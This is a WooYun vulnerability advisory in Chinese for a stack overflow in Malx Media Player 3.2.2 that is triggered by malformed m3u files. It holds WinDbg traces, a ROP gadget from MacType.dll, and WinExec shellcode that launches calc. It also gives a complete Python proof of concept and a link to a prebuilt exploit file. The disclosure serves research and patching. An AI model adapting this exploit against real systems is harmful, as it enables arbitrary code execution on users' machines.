当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051564

漏洞标题:Malx Media Player处理畸形m3u文件栈溢出本地任意代码执行

相关厂商:Malx Media Player

漏洞作者: blast

提交时间:2014-02-20 23:33

修复时间:2014-05-21 23:33

公开时间:2014-05-21 23:33

漏洞类型:远程代码执行

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-20: 细节已通知厂商并且等待厂商处理中
2014-02-25: 厂商已经确认,细节仅向厂商公开
2014-02-28: 细节向第三方安全合作伙伴开放
2014-04-21: 细节向核心白帽子及相关领域专家公开
2014-05-01: 细节向普通白帽子公开
2014-05-11: 细节向实习白帽子公开
2014-05-21: 细节向公众公开

简要描述:

Malx Media Player 3.2.2 处理畸形m3u文件时会发生栈溢出,从而可以让攻击者成功控制EIP,执行任意代码。(Win7 SP1配合MacType进行ROP)

详细说明:

Malx Media Player使用MAX_PATH作为参数初始化栈上变量,但是使用vfscanf时并没有考虑输入长度,导致栈溢出。 软件地址:http://malx-media-player.software.informer.com/
构建一个畸形M3U文件,然后载入程序,喜闻乐见的崩溃,kvn回溯栈调用发现它是从vfscanf进去的,看来一定是用了MAX_PATH了,再试一下它是从哪块函数调用上vfscanf的:

0:000> bp msvcrt!vfscanf
0:000> bl
0 e 76cf574d 0001 (0001) 0:**** msvcrt!vfscanf
1 eu 0001 (0001) (msvcrf!fscanf)
0:000> g
Breakpoint 0 hit
eax=0018f92c ebx=0018fb64 ecx=76c9a6db edx=0008e381 esi=76d22960 edi=76cf58b9
eip=76cf574d esp=0018f904 ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
msvcrt!vfscanf:
76cf574d 6a0c push 0Ch


gu两次,看到是从image00400000+0x46f0这儿进去的:

0:000> gu
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=76cf58d4 esp=0018f908 ebp=0018f91c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
msvcrt!fscanf+0x1b:
76cf58d4 83c414 add esp,14h
0:000> gu
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=004046f0 esp=0018f924 ebp=00000001 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
image00400000+0x46f0:
004046f0 83c40c add esp,0Ch


没代码没符号光看十分蛋疼,简单的判断一下出问题的区域,此时再gu一次

0:000> gu
(2304.288): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=01d5004c
eip=41414141 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
41414141 ?? ???


eip跳到了41414141,看来是覆盖了retn的地址。
重来,从之前的image00400000+0x46f0往后一直p,然后到retn为止发现都没事儿,那估计就是这个retn导致的:

Breakpoint 0 hit
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=00404744 esp=0018f93c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
image00400000+0x4744:
00404744 81c408020000 add esp,208h
0:000> dd esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0:000> p
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
image00400000+0x474a:
0040474a c3 ret


查看对应栈:

0:000> dd esp
0018fb44 41414141 41414141 41414141 41414141
0018fb54 41414141 41414141 41414141 41414141
0018fb64 41414141 41414141 41414141 41414141
0018fb74 41414141 41414141 41414141 41414141
0018fb84 43414141 43434343 43434343 43434343
0018fb94 43434343 43434343 43434343 43434343
0018fba4 43434343 43434343 43434343 43434343
0018fbb4 53434343 53535353 53535353 53535353


真是一个悲伤的故事啊……
由于倒数第二个是add esp,208h;那我们就倒回去看看:

0:000> dd esp-208 esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0018f9bc 00870000 00000000 01010000 0018f9ac
0018f9cc 00000068 0018fac4 77a671f5 114fc46b
0018f9dc fffffffe 77ac1794 77a7ac29 00870000
0018f9ec 50000063 77a238aa 66f6ee0f 00000000
0018f9fc 00870000 0088d110 00000000 00401270
0018fa0c 00000000 00de0706 00000084 00000000
0018fa1c 00680515 00000004 000003a8 00870000
0018fa2c 00000000 00000001 00000001 00000000
0018fa3c 00000000 415c3a41 41414141 41414141
0018fa4c 41414141 41414141 41414141 41414141
0018fa5c 41414141 41414141 41414141 41414141
0018fa6c 41414141 41414141 41414141 41414141
0018fa7c 41414141 41414141 41414141 41414141
0018fa8c 41414141 41414141 41414141 41414141
0018fa9c 41414141 41414141 41414141 41414141
0018faac 41414141 41414141 41414141 41414141
0018fabc 41414141 41414141 41414141 41414141
0018facc 41414141 41414141 41414141 41414141
0018fadc 41414141 41414141 41414141 41414141
0018faec 41414141 41414141 41414141 41414141
0018fafc 41414141 41414141 41414141 41414141
0018fb0c 41414141 41414141 41414141 41414141
0018fb1c 41414141 41414141 41414141 41414141
0018fb2c 41414141 41414141 41414141 41414141
0018fb3c 41414141 41414141 41414141


果然是一个悲伤的故事呀……
这个retn地址被覆盖的位置位于多少偏移处呢?

0:000> ?(18fa3c+4 - esp)
Evaluate expression: -260 = fffffefc


260,这个熟悉的数字,真是一个灾难。
找找ROP,发现MacType!ReloadConfig+0x24cca有一个很好很符合要求的ROP

---------------------- size 1
MacType!ReloadConfig+0x24cca:
1002756a 54 push esp
1002756b c3 ret


由于是在练手,所以咱也暂时不考虑通用性,查看WinExec的地址:

0:000> x kernel32!WinExec
768a2c51 kernel32!WinExec = <no type information>


大概就勾画出了我们的SHELLCODE的原始形态:
ROP 6a750210 #1002756a;MacType!ReloadConfig+0x24cca, push esp; ret;
#Shellcode start
$ 31C0 XOR EAX,EAX
$+2 50 PUSH EAX
$+3 B8 43414C43 MOV EAX,434C4143
$+8 50 PUSH EAX ;"CALC\0"
$+9 89E1 MOV ECX,ESP ;保存这个字符串的指针
$+B 40 INC EAX
$+C 50 PUSH EAX ;uCmdShow == 1
$+D 51 PUSH ECX ;lpCmdLine
$+E E8 XXXXXXX CALL WinExec
其实还要设置一个MOV EBX, ESP; DEC EBX,80H; MOV EBP,EBX;,这样才能保证WinExec不出错……INC EAX之前要XOR EAX,EAX一下,上面的是我之前打的草稿,我也偷个懒不贴机器码啦,OD里面一放就能查到

漏洞证明:

编辑M3U文件,载入运行,

f1.png


0:001> bp 40474a
*** WARNING: Unable to verify checksum for E:\Program Files (x86)\Mplay\mplay.exe
*** ERROR: Module load completed but symbols could not be loaded for E:\Program Files (x86)\Mplay\mplay.exe
0:001> g
Breakpoint 0 hit
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
mplay+0x474a:
0040474a c3 ret
0:000> p
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=1002756a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
*** WARNING: Unable to verify checksum for E:\Program Files (x86)\MacType\MacType.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Program Files (x86)\MacType\MacType.dll -
MacType!ReloadConfig+0x24cca:
1002756a 54 push esp
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=1002756b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
MacType!ReloadConfig+0x24ccb:
1002756b c3 ret
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb48 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
0018fb48 31c0 xor eax,eax
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb4a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb4a 50 push eax
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb4b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb4b b843414c43 mov eax,434C4143h
0:000>
eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb50 esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb50 50 push eax
0:000>
eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb51 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb51 89e1 mov ecx,esp
0:000>
eax=434c4143 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb53 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb53 40 inc eax
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb54 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb54 50 push eax
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb55 esp=0018fb3c ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb55 51 push ecx
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb56 esp=0018fb38 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb56 e8fb307176 call kernel32!WinExec+0x5 (768a2c56)
0:000> dd esp
0018fb38 0018fb40 434c4144 434c4143 00000000
0018fb48 b850c031 434c4143 40e18950 fbe85150
0018fb58 00767130 00000000 00000000 555c3a45
0018fb68 73726573 616c425c 53547473 7365445c
0018fb78 706f746b 6d2e375c 75007533 008fb710
0018fb88 00000000 ffffffec 00000000 020e4758
0018fb98 020e4758 008fb710 008fb710 0018fbe4
0018fba8 754a702c 008fb710 00000000 ffffffec
0:000> da 18fb40
0018fb40 "CALC"


注:Debug模式下MacType模块是不会注入的,所以如果要测试着玩的话,还是要让它自己跑再Attach才可以
POC:

#!/usr/bin/env python
print "blast off!"
filepath = "poc.m3u"
f = open(filepath, "wb")
file = '\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x75\x02\x10\x31\xc0\x50\xb8\x43\x41\x4c\x43\x50\x89\xe1\x40\x50\x51\xe8\xfb\x30\x71\x76\x00'
f.write(file)
f.close()
print "Done.\nOpen poc.m3u"


弄好的二进制文件:http://lno.pw/exp.m3u,由于为了省事,没有用通用的方式处理,所以WinExec地址请自行修改

修复方案:

使用_s安全输入函数

版权声明:转载请注明来源 blast@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-02-25 10:14

厂商回复:

最新状态:

暂无